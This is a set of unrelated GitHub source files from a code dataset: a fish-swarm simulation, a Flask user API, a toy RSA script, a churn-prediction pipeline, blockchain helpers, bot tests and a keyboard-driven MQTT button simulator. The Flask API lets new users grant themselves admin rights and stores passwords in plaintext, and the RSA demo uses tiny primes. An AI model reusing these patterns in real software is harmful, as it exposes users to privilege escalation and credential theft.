fish_handler = TimedRotatingFileHandler(\n Path.home() / self.config[\"LOGGING\"][\"FISH\"], when=\"H\", interval=1\n )\n fish_handler.setFormatter(formatter)\n # handler.setLevel(logging.CRITICAL)\n self.fish_logger.addHandler(fish_handler)\n self.fish_logger.warning(f\"Started a new behavior: {now}\")\n self.fish_logger.propagate = False\n\n self.logcounter = 0\n\n def setup_parameter_layout(self):\n logging.info(\"Behavior: Setting up parameter layout\")\n self.app = QApplication(sys.argv)\n layout = QVBoxLayout()\n\n title_label = QLabel(\"

      Parameter Window

      \")\n layout.addWidget(title_label)\n title_label.move(60, 15)\n\n self.window = QWidget()\n self.window.setWindowTitle(\"Parameter window\")\n self.window.setGeometry(100, 100, 200, 200)\n self.window.move(60, 15)\n self.window.setLayout(layout)\n self.window.show()\n\n return layout\n\n def setup_debug_vis(self) -> None:\n self.debug_vis.setArena(self.arena)\n\n def setup_parameter_ui(self) -> None:\n logging.info(\"Behavior: Setting up parameter ui\")\n self.parameter_ui = Parameter_UI(self, False, self.config)\n #\n self.parent_layout.addLayout(self.parameter_ui)\n\n #\n # looping method\n #\n\n def next_speeds(self, robots, fish, timestep):\n \"\"\"\n looping method:\n - the simulation agents are managed\n \"\"\"\n try:\n if self.optimisation:\n start_time = time.time()\n\n try:\n # execute all commands in queue first\n while not (self.com_queue.empty()):\n command = self.com_queue.get()\n if self.config[\"DEBUG\"][\"console\"]:\n logging.info(command)\n try:\n func = getattr(self, command[0])\n args = command[1:]\n func(*args)\n except Exception as e:\n logging.error(\n f\"BEHAVIOR: Command not found or error in command execution! {command}\"\n )\n logging.error(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n except Exception as e:\n logging.error(f\"BEHAVIOR: Error in command queue\")\n logging.error(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n # TICK - update all fish one time step forward (tick)\n try:\n all_agents = [self.behavior_robot]\n all_agents.extend(self.allfish)\n all_pos = np.asarray(\n [np.array(a.pos, dtype=np.float64) for a in all_agents]\n )\n all_dir = np.asarray([a.dir for a in all_agents])\n dist_m = distance_matrix(all_pos, all_pos)\n\n for id_f, f in enumerate(all_agents):\n f.tick(all_pos, all_dir, dist_m[id_f])\n # check if fish following the robot\n if id_f != 0:\n robot_pos = all_pos[0]\n robot_dir = all_dir[0]\n f.check_following(robot_pos, robot_dir)\n except Exception as e:\n logging.error(f\"BEHAVIOR: Error in tick\")\n logging.error(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n # MOVE - move everything by new updated direction and speed\n try:\n try:\n for f in all_agents:\n f.move()\n except Exception as e:\n logging.error(f\"BEHAVIOR: Error in all agents move\")\n logging(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n except Exception as e:\n logging.error(f\"BEHAVIOR: Error in move\")\n logging.error(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n # Update fish in tracking view and send positions\n serialized = serialize(self.behavior_robot, self.allfish)\n self.update_positions.emit(serialized)\n\n # log fish every few ticks when user controlled\n if self.behavior_robot.user_controlled:\n if self.logcounter == 5:\n self.fish_logger.info(f\"{serialized}\")\n self.logcounter = 0\n self.logcounter += 1\n\n if self.optimisation:\n end_time = time.time()\n exec_time = end_time - start_time\n\n if self.exec_stepper == 100:\n self.exec_stepper = 0\n self.exec_time = 0\n self.exec_stepper += 1\n self.exec_time += exec_time\n mean_exec_time = self.exec_time / self.exec_stepper\n logging.info(\n f\"mean tick takes {mean_exec_time} seconds; last tick took {exec_time} seconds\"\n )\n\n except Exception as e:\n logging.error(f\"BEHAVIOR: Error in next_speeds!\")\n logging.error(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n\n def run_thread(self) -> None:\n timestep = 0\n while True:\n self.next_speeds([], [], timestep)\n timestep += 1\n time.sleep(self.time_step)\n\n def __del__(self) -> None:\n pass\n\n def app_exec(self) -> None:\n sys.exit(self.app.exec_())\n\n def serialize(self) -> list:\n out = []\n # robot\n robo_dict = {\n \"id\": self.behavior_robot.id,\n \"orientation\": np.around(self.behavior_robot.ori, decimals=2),\n \"position\": np.rint(self.behavior_robot.pos).tolist(),\n }\n out.append(robo_dict)\n # fish\n for a in self.allfish:\n fish_dict = {\n \"id\": a.id,\n \"orientation\": np.around(a.ori, decimals=2),\n \"position\": np.rint(a.pos).tolist(),\n \"following\": a.following,\n \"repulsed\": a.repulsed,\n }\n # out.append([np.rint(a.pos).tolist(), np.around(a.ori, decimals=2), a.id])\n out.append(fish_dict)\n\n return out\n\n def queue_command(self, command) -> None:\n self.com_queue.put((command[0], command[1]))\n\n #\n # Commands\n #\n # region \n def reset_fish(self, num) -> None:\n \"\"\"\n Receive position reset for current fish\n \"\"\"\n self.allfish = [\n Fish(\n id=i + 1,\n pos=np.asarray(\n [\n random.randint(1, self.arena.width - 1),\n random.randint(1, self.arena.height - 1),\n ]\n ),\n ori=random.randint(0, 360),\n arena=self.arena,\n config=self.config,\n dir=None,\n zor=self.zor,\n zoo=self.zoo,\n zoa=self.zoa,\n )\n for i in range(num)\n ]\n\n # always set fish with id 1 to position 1500,500 if existing\n if len(self.allfish) > 0:\n if self.allfish[0].id == 1:\n self.allfish[0].pos = np.asarray([1500, 500])\n else:\n logging.error(\"BEHAVIOR: Fish with id 1 not existing!\")\n\n self.update_ellipses.emit(self.behavior_robot, self.allfish)\n if self.parameter_ui:\n self.parameter_ui.num_fish_spinbox.setValue(num)\n\n def control_robot(self, flag) -> None:\n \"\"\"\n Receive robot user control trigger\n \"\"\"\n self.behavior_robot.controlled = flag\n self.controlled = flag\n self.behavior_robot.user_controlled = flag\n\n if not flag:\n self.behavior_robot.max_speed = self.config[\"DEFAULTS\"][\"max_speed\"]\n self.behavior_robot.stop = False\n\n def change_robodir(self, dir):\n \"\"\"\n - receives joystick input and translates it into robot direction\n - dir cannot be [0,0]\n \"\"\"\n # dir cannot be [0,0]\n if not (np.abs(dir) == np.asarray([0.0, 0.0])).all():\n self.behavior_robot.stop = False\n np_dir = np.asarray(dir)\n dir_len = np.linalg.norm(np_dir)\n self.behavior_robot.max_speed = self.config[\"DEFAULTS\"][\"max_speed\"] + 10\n self.behavior_robot.new_dir = (\n np_dir / dir_len if dir_len != 0 and dir_len > 1 else np_dir\n )\n else:\n self.behavior_robot.max_speed = 0\n self.behavior_robot.stop = True\n\n def change_zones(self, zone_dir):\n \"\"\"\n Change zone radii for all agents\n \"\"\"\n self.zor = zone_dir.get(\"zor\", self.zor)\n self.zoo = zone_dir.get(\"zoo\", self.zoo)\n self.zoa = zone_dir.get(\"zoa\", self.zoa)\n\n self.behavior_robot.change_zones(self.zor, self.zoo, self.zoa)\n for f in self.allfish:\n f.change_zones(self.zor, self.zoo, self.zoa)\n\n if self.debug_vis:\n self.update_ellipses.emit(self.behavior_robot, self.allfish)\n\n self.parameter_ui.zor_spinbox.setValue(self.zor)\n self.parameter_ui.zoo_spinbox.setValue(self.zoo)\n self.parameter_ui.zoa_spinbox.setValue(self.zoa)\n\n def set_zone_preset(self, size):\n \"\"\"\n Change zone radii for all agents to preset\n \"\"\"\n if size == 0:\n self.zor = self.config[\"ZONE_MODES\"][\"SMALL\"][\"zor\"]\n self.zoo = self.config[\"ZONE_MODES\"][\"SMALL\"][\"zoo\"]\n self.zoa = self.config[\"ZONE_MODES\"][\"SMALL\"][\"zoa\"]\n\n if size == 1:\n self.zor = self.config[\"ZONE_MODES\"][\"LARGE\"][\"zor\"]\n self.zoo = self.config[\"ZONE_MODES\"][\"LARGE\"][\"zoo\"]\n self.zoa = self.config[\"ZONE_MODES\"][\"LARGE\"][\"zoa\"]\n\n if size == 2:\n self.zor = self.config[\"ZONE_MODES\"][\"CHALL\"][\"zor\"]\n self.zoo = self.config[\"ZONE_MODES\"][\"CHALL\"][\"zoo\"]\n self.zoa = self.config[\"ZONE_MODES\"][\"CHALL\"][\"zoa\"]\n\n for f in self.allfish:\n f.change_zones(self.zor, self.zoo, self.zoa)\n\n if self.debug_vis:\n self.update_ellipses.emit(self.behavior_robot, self.allfish)\n\n self.parameter_ui.zor_spinbox.setValue(self.zor)\n self.parameter_ui.zoo_spinbox.setValue(self.zoo)\n self.parameter_ui.zoa_spinbox.setValue(self.zoa)\n\n def set_speed(self, speed):\n \"\"\"\n Set speed of all fish\n \"\"\"\n for f in self.allfish:\n if f.id != 0:\n f.max_speed = speed\n\n def challenge_status(self, toggle):\n \"\"\"\n Receive challenge status update\n \"\"\"\n status = \"started!\" if toggle == 1 else \"stopped!\"\n logging.info(f\"Challenge {status}\")\n\n # endregion\n","repo_name":"jotpio/behavior_HF","sub_path":"src/challenge_simulation.py","file_name":"challenge_simulation.py","file_ext":"py","file_size_in_byte":17272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16368815613","text":"from flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\nfrom models.user import UserModel\n\n\nclass User(Resource):\n parse = reqparse.RequestParser()\n parse.add_argument(\n \"unique_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty!\",\n )\n parse.add_argument(\n \"first_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"last_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"is_admin\",\n type=bool,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"password\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n\n @jwt_required()\n def get(self, unique_name):\n user = UserModel.find_by_unique_name(unique_name)\n if user:\n return user.json()\n return {\"message\": \"User not found.\"}\n\n @jwt_required()\n def delete(self, unique_name):\n user = UserModel.find_by_unique_name(unique_name)\n if user:\n user.delete_from_db()\n return {\"message\": \"User deleted.\"}, 200\n\n @jwt_required()\n def put(self, unique_name):\n data = User.parse.parse_args()\n user = UserModel.find_by_unique_name(unique_name)\n if user:\n if user.password != data[\"password\"]:\n return {\"message\": \"Password does not match\"}\n\n user.name = data[\"name\"]\n user.first_name = data[\"first_name\"]\n user.last_name = data[\"last_name\"]\n user.is_admin = data[\"is_admin\"]\n user.save_to_db()\n else:\n return {\"message\": \"Please register first\"}\n return user.json(), 202\n\n\nclass UserRegister(Resource):\n \"\"\"\n Handle new users register\n \"\"\"\n\n parse = reqparse.RequestParser()\n parse.add_argument(\n \"unique_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty!\",\n )\n parse.add_argument(\n \"first_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"last_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"is_admin\",\n type=bool,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"password\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n\n def post(self):\n data = UserRegister.parse.parse_args()\n if UserModel.find_by_unique_name(data[\"unique_name\"]):\n return {\"message\": \"User already exists\"}\n\n # user = UserModel(\n # data[\"unique_name\"],\n # data[\"name\"],\n # data[\"first_name\"],\n # data[\"is_admin\"],\n # data[\"password\"],\n # )\n user = UserModel(**data)\n user.save_to_db()\n\n return {\"message\": \"User created successfully\"}, 202\n","repo_name":"iteemhe/office-hours-queue","sub_path":"api/resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6568266115","text":"__author__ = 'Rakatak'\n# given values\n\ndef egcd(a, b):\n x,y, u,v = 0,1, 1,0\n while a != 0:\n q, r = b//a, b%a\n m, n = x-u*q, y-v*q\n b,a, x,y, u,v = a,r, u,v, m,n\n gcd = b\n return gcd, x, y\n\ndef modinv(a, m):\n gcd, x, y = egcd(a, m)\n if gcd != 1:\n return None # modular inverse does not exist\n else:\n return x % m\n\np = 41\nq = 17\ne = 39\nm = 9\n\nn = p * q\nprint(\"n = \" + str(n))\nphiN = (p - 1) * (q - 1)\nprint(\"phiN = \" + str(phiN))\nd = modinv(e, phiN)\nprint(\"Inverse to phiN and e is \" + str(d))\nprint(\"d = \" + str(d))\nvalueOne = (d*e) % phiN\nprint(\"valueOne = \" + str(valueOne))\nprint(\"Public key is (e, n) => (3, \" + str(n) + \")\")\nprint(\"Private key is (d, n) => (27, \" + str(n) + \")\")\nc = m**e % n\nprint(\"Encrypted Message of 9 is \" + str(c))\ndM = c**d % n\nprint(\"Decrypted Message of \" + str(c) + \" is \" + str(dM))\n","repo_name":"Rakatak/SichereVerteilteSysteme","sub_path":"A3/RSAExp.py","file_name":"RSAExp.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"894084895","text":"# library doc string\n\n\n# import libraries\nimport shap\nimport joblib\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns; sns.set()\n\nfrom sklearn.preprocessing import normalize\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.metrics import plot_roc_curve, classification_report\n\n\ndef import_data(pth):\n '''\n returns dataframe for the csv found at pth\n\n input:\n pth: a path to the csv\n output:\n df: pandas dataframe\n '''\n df = pd.read_csv(pth)\n df['Churn'] = df['Attrition_Flag'].apply(lambda val: 0 if val == \"Existing Customer\" else 1)\n return df\n\n\ndef perform_eda(df):\n '''\n perform eda on df and save figures to images folder\n input:\n df: pandas dataframe\n\n output:\n None\n '''\n df['Churn'] = df['Attrition_Flag'].apply(lambda val: 0 if val == \"Existing Customer\" else 1)\n plt.figure(figsize=(20,10)) \n df['Churn'].hist();\n plt.savefig('./images/churn.png')\n\n plt.figure(figsize=(20,10))\n df['Customer_Age'].hist();\n plt.savefig('./images/test.png')\n \n\n\ndef encoder_helper(df, category_lst, response='Churn'):\n '''\n helper function to turn each categorical column into a new column with\n propotion of churn for each category - associated with cell 15 from the notebook\n\n input:\n df: pandas dataframe\n category_lst: list of columns that contain categorical features\n response: string of response name [optional argument that could be used for naming variables or index y column]\n\n output:\n df: pandas dataframe with new columns for\n '''\n for category in category_lst:\n category_list=[]\n category_groups = df.groupby(category).mean()['Churn']\n\n for val in df[category]:\n category_list.append(category_groups.loc[val])\n \n df[category+'_'+response] = category_list\n return df\n\n\ndef perform_feature_engineering(df, response=['Customer_Age', 'Dependent_count', 'Months_on_book',\n 'Total_Relationship_Count', 'Months_Inactive_12_mon',\n 'Contacts_Count_12_mon', 'Credit_Limit', 'Total_Revolving_Bal',\n 'Avg_Open_To_Buy', 'Total_Amt_Chng_Q4_Q1', 'Total_Trans_Amt',\n 'Total_Trans_Ct', 'Total_Ct_Chng_Q4_Q1', 'Avg_Utilization_Ratio',\n 'Gender_Churn', 'Education_Level_Churn', 'Marital_Status_Churn', \n 'Income_Category_Churn', 'Card_Category_Churn']):\n '''\n input:\n df: pandas dataframe\n response: string of response name [optional argument that could be used for naming variables or index y column]\n\n output:\n X_train: X training data\n X_test: X testing data\n y_train: y training data\n y_test: y testing data\n '''\n y = df['Churn']\n X_data = pd.DataFrame()\n X_data[response] = df[response]\n model_dict = dict()\n X_data_2 = X_data\n X_train, X_test, y_train, y_test = train_test_split(X_data, y, test_size= 0.3, random_state=42)\n \n model_dict['X_train']=X_train\n model_dict['X_test']=X_test\n model_dict['y_train']=y_train\n model_dict['y_test']=y_test\n \n return (model_dict, X_data_2)\n\ndef classification_report_image(y_train,\n y_test,\n y_train_preds_lr,\n y_train_preds_rf,\n y_test_preds_lr,\n y_test_preds_rf,\n output_pth):\n '''\n produces classification report for training and testing results and stores report as image\n in images folder\n input:\n y_train: training response values\n y_test: test response values\n y_train_preds_lr: training predictions from logistic regression\n y_train_preds_rf: training predictions from random forest\n y_test_preds_lr: test predictions from logistic regression\n y_test_preds_rf: test predictions from random forest\n\n output:\n None\n '''\n\n plt.clf()\n plt.rc('figure', figsize=(5, 5))\n plt.text(0.01, 1, str('Random Forest Train Results'), {\n 'fontsize': 10}, fontproperties='monospace')\n \n plt.text(0.01, 0.7, str(classification_report(y_test, y_test_preds_rf)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n \n plt.text(0.01, 0.6, str('Random Forest Test Results'), {\n 'fontsize': 10}, fontproperties='monospace')\n \n plt.text(0.01, 0.3, str(classification_report(y_train, y_train_preds_rf)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n \n plt.text(0.6, 1, str('Logistic Regression Train Results'), {\n 'fontsize': 10}, fontproperties='monospace')\n \n plt.text(0.6, 0.7, str(classification_report(y_train, y_train_preds_lr)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n \n plt.text(0.6, 0.6, str('Logistic Regression Test Results'), {\n 'fontsize': 10}, fontproperties='monospace')\n \n plt.text(0.6, 0.3, str(classification_report(y_test, y_test_preds_lr)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n\n plt.savefig(output_pth + 'model_results.png')\n \ndef feature_importance_plot(cv_rfc, X_data, output_pth):\n '''\n creates and stores the feature importances in pth\n input:\n model: model object containing feature_importances_\n X_data: pandas dataframe of X values\n output_pth: path to store the figure\n\n output:\n None\n '''\n \n # Calculate feature importances\n importances = cv_rfc.best_estimator_.feature_importances_\n # importances = model.feature_importances_\n # Sort feature importances in descending order\n indices = np.argsort(importances)[::-1]\n\n # Rearrange feature names so they match the sorted feature importances\n names = [X_data.columns[i] for i in indices]\n\n # Create plot\n plt.figure(figsize=(20,5))\n\n # Create plot title\n plt.title(\"Feature Importance\")\n plt.ylabel('Importance')\n\n # Add bars\n plt.bar(range(X_data.shape[1]), importances[indices])\n\n # Add feature names as x-axis labels\n plt.xticks(range(X_data.shape[1]), names, rotation=90)\n # plt.subplots_adjust(bottom=.15)\n # Save Plot\n plt.savefig(output_pth + 'features.png')\n\ndef train_models(feature_engineering_dict):\n '''\n train, store model results: images + scores, and store models\n input:\n X_train: X training data\n X_test: X testing data\n y_train: y training data\n y_test: y testing data\n output:\n None\n '''\n X_train = feature_engineering_dict['X_train']\n X_test = feature_engineering_dict['X_test']\n y_train = feature_engineering_dict['y_train']\n y_test = feature_engineering_dict['y_test']\n\n # grid search\n rfc = RandomForestClassifier(random_state=42)\n lrc = LogisticRegression(solver='lbfgs', max_iter=3000)\n\n param_grid = { \n 'n_estimators': [200, 500],\n 'max_features': ['auto', 'sqrt'],\n 'max_depth' : [4,5,100],\n 'criterion' :['gini', 'entropy']\n }\n\n cv_rfc = GridSearchCV(estimator=rfc, param_grid=param_grid, cv=5)\n cv_rfc.fit(X_train, y_train)\n\n lrc.fit(X_train, y_train)\n\n y_train_preds_rf = cv_rfc.best_estimator_.predict(X_train)\n y_test_preds_rf = cv_rfc.best_estimator_.predict(X_test)\n\n y_train_preds_lr = lrc.predict(X_train)\n y_test_preds_lr = lrc.predict(X_test)\n\n lrc_plot = plot_roc_curve(lrc, X_test, y_test)\n plt.savefig('./images/model_1.png')\n # plots\n plt.figure(figsize=(15, 8))\n ax = plt.gca()\n rfc_disp = plot_roc_curve(cv_rfc.best_estimator_, X_test, y_test, ax=ax, alpha=0.8)\n lrc_plot.plot(ax=ax, alpha=0.8)\n plt.savefig('./images/model_2.png')\n\n \n # save best model\n joblib.dump(cv_rfc.best_estimator_, './models/rfc_model.pkl')\n joblib.dump(lrc, './models/logistic_model.pkl')\n \n rfc_model = joblib.load('./models/rfc_model.pkl')\n lr_model = joblib.load('./models/logistic_model.pkl')\n\n lrc_plot = plot_roc_curve(lr_model, X_test, y_test)\n plt.savefig('./images/model_3.png')\n\n plt.figure(figsize=(15, 8))\n ax = plt.gca()\n rfc_disp = plot_roc_curve(rfc_model, X_test, y_test, ax=ax, alpha=0.8)\n lrc_plot.plot(ax=ax, alpha=0.8)\n plt.savefig('./images/model_4.png')\n \n \n return y_train, y_test, y_train_preds_lr, y_train_preds_rf, y_test_preds_lr, y_test_preds_rf, rfc_model, lr_model, cv_rfc\nif __name__ == \"__main__\":\n df = import_data('./data/bank_data.csv')\n perform_eda(import_data('./data/bank_data.csv'))\n category_list=['Gender','Education_Level','Marital_Status','Income_Category','Card_Category']\n df = (encoder_helper(df,category_list))\n model_dict, X_data = perform_feature_engineering(df)\n a,b,c,d,e,f,rfc_model, lr_model, cv_rfc = train_models(model_dict)\n # classification_report_image(a,b,c,d,e,f,'./images/')\n feature_importance_plot(cv_rfc, X_data, './')\n","repo_name":"gonzalezpear/churn_udacity_project","sub_path":"churn_library.py","file_name":"churn_library.py","file_ext":"py","file_size_in_byte":10158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35621576079","text":"\"\"\"Provides verification helper methods\"\"\"\n\nfrom utility.hash_util import hash_block, hash_string_256\nfrom wallet import Wallet\n\n\nclass VerficationHelper:\n \n @staticmethod\n def valid_proof(transactions, last_hash, proof):\n guess = (str([tx.to_ordered_dict() for tx in transactions]) + str(last_hash) + str(proof)).encode() \n guess_hash = hash_string_256(guess)\n # print(guess_hash)\n return guess_hash[0:4] == '0000'\n\n @classmethod\n def verify_chain(cls, blockchain):\n for (index, block) in enumerate(blockchain):\n if index == 0:\n continue\n if block.previous_hash != hash_block(blockchain[index-1]):\n return False\n\n if not cls.valid_proof(block.trax[:-1], block.previous_hash, block.proof):\n print('Proof of work is invalid')\n return False\n return True\n\n @staticmethod\n def verify_trax(transaction, get_balance, check_funds=True):\n if check_funds == True:\n sender_balance = get_balance(transaction.tx_sender)\n return sender_balance >= transaction.tx_amount and Wallet.verify_traxSign(transaction)\n else:\n return Wallet.verify_traxSign(transaction)\n\n @classmethod\n def verify_allTrax(cls, open_trax, get_balance):\n return all([cls.verify_trax(el,get_balance, False) for el in open_trax])","repo_name":"MWaris97/Projects","sub_path":"FYP/source/TessChain/utility/verificationHelper.py","file_name":"verificationHelper.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43348856698","text":"import json\nfrom pathlib import Path\nfrom unittest.mock import Mock\n\nimport pytest\nimport textwrap\nimport responses as rsps\nimport click\nfrom ruamel.yaml import YAML\n\nfrom archery.bot import (\n CommentBot, CommandError, CrossbowCommentFormatter, group\n)\n\n\n@pytest.fixture\ndef responses():\n with rsps.RequestsMock() as mock:\n yield mock\n\n\ndef load_fixture(name):\n path = Path(__file__).parent / 'fixtures' / name\n with path.open('r') as fp:\n if name.endswith('.json'):\n return json.load(fp)\n elif name.endswith('.yaml'):\n yaml = YAML()\n return yaml.load(fp)\n else:\n return fp.read()\n\n\ndef github_url(path):\n return 'https://api.github.com:443/{}'.format(path.strip('/'))\n\n\n@group()\ndef custom_handler():\n pass\n\n\n@custom_handler.command()\n@click.pass_obj\ndef extra(obj):\n return obj\n\n\n@custom_handler.command()\n@click.option('--force', '-f', is_flag=True)\ndef build(force):\n return force\n\n\n@custom_handler.command()\n@click.option('--name', required=True)\ndef benchmark(name):\n return name\n\n\ndef test_click_based_commands():\n assert custom_handler('build') is False\n assert custom_handler('build -f') is True\n\n assert custom_handler('benchmark --name strings') == 'strings'\n with pytest.raises(CommandError):\n assert custom_handler('benchmark')\n\n assert custom_handler('extra', extra='data') == {'extra': 'data'}\n\n\ndef test_crossbow_comment_formatter():\n job = load_fixture('crossbow-job.yaml')\n msg = load_fixture('crossbow-success-message.md')\n\n formatter = CrossbowCommentFormatter(crossbow_repo='ursa-labs/crossbow')\n response = formatter.render(job)\n expected = msg.format(\n repo='ursa-labs/crossbow',\n branch='ursabot-1',\n revision='f766a1d615dd1b7ee706d05102e579195951a61c',\n status='has been succeeded.'\n )\n assert response == textwrap.dedent(expected).strip()\n\n\n@pytest.mark.parametrize('fixture_name', [\n # the bot is not mentioned, nothing to do\n 'event-issue-comment-not-mentioning-ursabot.json',\n # don't respond to itself, it prevents recursive comment storms!\n 'event-issue-comment-by-ursabot.json',\n # non-authorized user sent the comment, do not respond\n 'event-issue-comment-by-non-authorized-user.json',\n])\ndef test_noop_events(fixture_name):\n payload = load_fixture(fixture_name)\n\n handler = Mock()\n bot = CommentBot(name='ursabot', token='', handler=handler)\n bot.handle('issue_comment', payload)\n\n handler.assert_not_called()\n\n\ndef test_issue_comment_without_pull_request(responses):\n responses.add(\n responses.GET,\n github_url('/repositories/169101701/issues/19'),\n json=load_fixture('issue-19.json'),\n status=200\n )\n responses.add(\n responses.GET,\n github_url('repos/ursa-labs/ursabot/pulls/19'),\n json={},\n status=404\n )\n responses.add(\n responses.POST,\n github_url('/repos/ursa-labs/ursabot/issues/19/comments'),\n json={}\n )\n\n def handler(command, **kwargs):\n pass\n\n payload = load_fixture('event-issue-comment-without-pull-request.json')\n bot = CommentBot(name='ursabot', token='', handler=handler)\n bot.handle('issue_comment', payload)\n\n post = responses.calls[2]\n assert json.loads(post.request.body) == {\n 'body': \"The comment bot only listens to pull request comments!\"\n }\n\n\ndef test_respond_with_usage(responses):\n responses.add(\n responses.GET,\n github_url('/repositories/169101701/issues/26'),\n json=load_fixture('issue-26.json'),\n status=200\n )\n responses.add(\n responses.GET,\n github_url('/repos/ursa-labs/ursabot/pulls/26'),\n json=load_fixture('pull-request-26.json'),\n status=200\n )\n responses.add(\n responses.GET,\n github_url('/repos/ursa-labs/ursabot/issues/comments/480243811'),\n json=load_fixture('issue-comment-480243811.json')\n )\n responses.add(\n responses.POST,\n github_url('/repos/ursa-labs/ursabot/issues/26/comments'),\n json={}\n )\n\n def handler(command, **kwargs):\n raise CommandError('test-usage')\n\n payload = load_fixture('event-issue-comment-with-empty-command.json')\n bot = CommentBot(name='ursabot', token='', handler=handler)\n bot.handle('issue_comment', payload)\n\n post = responses.calls[3]\n assert json.loads(post.request.body) == {'body': '```\\ntest-usage\\n```'}\n\n\n@pytest.mark.parametrize(('command', 'reaction'), [\n ('@ursabot build', '+1'),\n ('@ursabot listen', '-1'),\n])\ndef test_issue_comment_with_commands(responses, command, reaction):\n responses.add(\n responses.GET,\n github_url('/repositories/169101701/issues/26'),\n json=load_fixture('issue-26.json'),\n status=200\n )\n responses.add(\n responses.GET,\n github_url('/repos/ursa-labs/ursabot/pulls/26'),\n json=load_fixture('pull-request-26.json'),\n status=200\n )\n responses.add(\n responses.GET,\n github_url('/repos/ursa-labs/ursabot/issues/comments/480248726'),\n json=load_fixture('issue-comment-480248726.json')\n )\n responses.add(\n responses.POST,\n github_url(\n '/repos/ursa-labs/ursabot/issues/comments/480248726/reactions'\n ),\n json={}\n )\n\n def handler(command, **kwargs):\n if command == 'build':\n return True\n else:\n raise ValueError('Only `build` command is supported.')\n\n payload = load_fixture('event-issue-comment-build-command.json')\n payload[\"comment\"][\"body\"] = command\n\n bot = CommentBot(name='ursabot', token='', handler=handler)\n bot.handle('issue_comment', payload)\n\n post = responses.calls[3]\n assert json.loads(post.request.body) == {'content': reaction}\n\n\n# TODO(kszucs): properly mock it\n# def test_crossbow_submit():\n# from click.testing import CliRunner\n# runner = CliRunner()\n# result = runner.invoke(\n# bot, ['crossbow', 'submit', '-g', 'wheel', '--dry-run']\n# )\n# assert result.exit_code == 0\n","repo_name":"snowflakedb/libsnowflakeclient","sub_path":"deps/arrow-0.17.1/dev/archery/archery/tests/test_bot.py","file_name":"test_bot.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"30909564890","text":"from pynput import keyboard\n\nfrom mqtt.mqtt_client import MQTTClient\nfrom virtual_devices.button_v import ButtonV, ButtonState\n\nclient1 = MQTTClient(\"fogdevices.agh.edu.pl\")\nbutton_1 = ButtonV(2, 3, client1)\nbutton_2 = ButtonV(2, 4, client1)\nbutton_3 = ButtonV(2, 5, client1)\n\nbuttons = [button_1, button_2, button_3]\n\n\"\"\"\nExample shows simple simulation of button pressing/releasing in reaction for keyboard pressing. Pressing 0,1,2 keys \ntriggers event for appropriate buttons. When button state changes, mqtt message is generated. Scenario decorators are\nnot used in this example.\n\"\"\"\n\n\ndef on_press(key):\n if hasattr(key, 'char') and key.char in ['0', '1', '2']:\n print('alphanumeric key {0} pressed'.format(key.char))\n buttons[int(key.char)].set_state_v(ButtonState.ON)\n elif key == keyboard.Key.esc:\n return False\n else:\n print('special key {0} pressed'.format(key))\n\n\ndef on_release(key):\n print('{0} released'.format(key))\n if hasattr(key, 'char') and key.char in ['0', '1', '2']:\n print('alphanumeric key {0} pressed'.format(key.char))\n buttons[int(key.char)].set_state_v(ButtonState.OFF)\n\n elif key == keyboard.Key.esc:\n return False\n\n\n# Collect events until released\nwith keyboard.Listener(\n on_press=on_press,\n on_release=on_release) as listener:\n 